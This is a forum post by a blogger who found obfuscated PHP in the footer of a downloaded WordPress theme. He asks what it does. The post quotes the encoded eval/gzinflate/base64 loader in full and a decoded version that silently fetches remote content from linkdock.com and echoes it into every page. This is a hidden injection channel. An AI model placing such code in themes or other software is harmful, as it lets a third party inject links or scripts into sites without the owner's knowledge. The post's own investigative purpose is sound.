paul
Ninja
Today I download a wordpress theme for my blog. It's called simplejojo and it looks quite nice. But I looked at the footer code and I was surprised that there was something encoded. Here is the code:
online version
http://paul.feckthat.com/coded.txt
I decoded and it looks like
download : http://paul.feckthat.com/decoded.txt
But I am still at a loss to see what it does. I couldn't find anything on the linkdock.com domain.
I wonder it they use the code for inserting link ads of some sorts. I tried to visit some blogs with the useragent changed to the google bot, but nothing extra was displayed.
http://paul.feckthat.com/decoded.txt
Code:
<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A')));
?>
http://paul.feckthat.com/coded.txt
I decoded and it looks like
Code:
error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);
if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
$content = @file($CodeURL);
echo @join("", $content);
} elseif (function_exists("curl_init")) {
$ch = curl_init($CodeURL);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
But I am still at a loss to see what it does. I couldn't find anything on the linkdock.com domain.
I wonder it they use the code for inserting link ads of some sorts. I tried to visit some blogs with the useragent changed to the google bot, but nothing extra was displayed.
http://paul.feckthat.com/decoded.txt